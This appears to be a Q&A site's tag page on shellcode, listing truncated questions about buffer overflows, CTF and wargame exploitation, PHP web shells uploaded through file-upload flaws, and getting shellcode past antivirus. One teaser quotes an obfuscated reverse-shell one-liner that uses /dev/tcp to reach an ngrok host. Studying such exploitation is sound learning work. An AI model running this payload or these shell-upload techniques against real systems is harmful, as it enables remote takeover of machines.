Questions tagged [shellcode]
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.
245 questions
1 vote
1 answer
80 views
Payload doesnt fires up outside gdb?
I'm very beginner in exploitation, I'm stuck in rather very famous why my exploit works in gdb but not in terminal? Context: I'm using Qemu emulator, using Qcow2 image of amd64 https://exploit....
- 21
0 votes
0 answers
77 views
May read() syscall not set first bytes of a buffer?
I'm working on some pwn.college binary exploitation challenges. ASLR is disable, stack is executable and there is no canary. I'm not understanding one thing. I have my shellcode which open the flag ...
- 111
0 votes
0 answers
205 views
bin/sh in return-to-libc attacks
Return-to-libc is an attack where the attacker, in most cases, returns to the system function, which it uses to execute shell commands. However, I am confused about two things: The command that the ...
- 1
0 votes
0 answers
379 views
Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?
I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?...
- 129
1 vote
2 answers
173 views
PHP embedded within PNG is not executing rather randering in IIS but executes in Apache
I am pentesting a site with all permissions. I have been able to upload a PHP shell embedded within a png image. I have also been able to change the extension of the file like something.php. So my ...
- 129
1 vote
0 answers
214 views
How to get Avast to stop quarantining my program?
I need to use a .NET shellcode inside a c++ unmanaged process. Let me be clear the shellcode is not malicious by any means, I just need it to load .NET code in an unmanaged process. Antivirus won't ...
1 vote
0 answers
106 views
How can I jump to an address after executing a donut shellcode?
I'm looking to execute a shellcode by packaging it inside an executable. I generate an executable (open the calculator) I output a shellcode from the executable with donut. donut.exe -i opencalc.exe ...
- 11
1 vote
0 answers
531 views
Buffer Overflow shell
I'm trying to exploit the code posted by ir0nstone at this link. I followed any of the steps listed in the tutorial, but Address space layout randomization (ASLR) is not enabled on my machine. When I ...
- 11
0 votes
1 answer
174 views
Reverse Shell payload does not work
$(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27') -i: -c: line 1: unexpected EOF while looking for matching `'' I was trying to get a ...
0 votes
0 answers
224 views
push /bin/sh to get a shell
I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one : Put in case that I can control the RIP and there are no limitations or filters. So I can execute ...
- 1
1 vote
0 answers
180 views
How can I exploit the following code using string format vulnerabilities, Global offset table & GDB? [closed]
The following code should be exploited and I need to exploit it in such a way that it runs my command (l33t) and there should be shellcode and exploit included, so that it runs my command. I believe I ...
- 11
1 vote
0 answers
205 views
How to properly pack address into bytes to overwrite EIP register
I'm learning how to exploit a tiny web server based on a well written post here: https://blog.coffinsec.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html I am very close to ...
- 111
0 votes
0 answers
455 views
Encoding shellcode to hide in filename / directory
Working on a CTF challenge and the coordinators hint suggests that one of the vectors to inject shellcode is via pathing. Looking at debugging prints does show the cwd and filename are passed onto the ...
- 1
0 votes
1 answer
367 views
Exporting shellcode to environment variable doesn't work as expected
(This is a question regarding a challenge in a wargame on overthewire.org called Narnia similar to Shellcode does not execute as the owner ) When exporting shellcode to EGG environment variable export ...
0 votes
2 answers
864 views
Unable to execute shellcode on x86_64 architecture
I currently got interested in binary exploitation (even though I do not know if today is still useful). I started studying shellcode and buffer overflow (stack-buffer overflow, specifically). I know ...
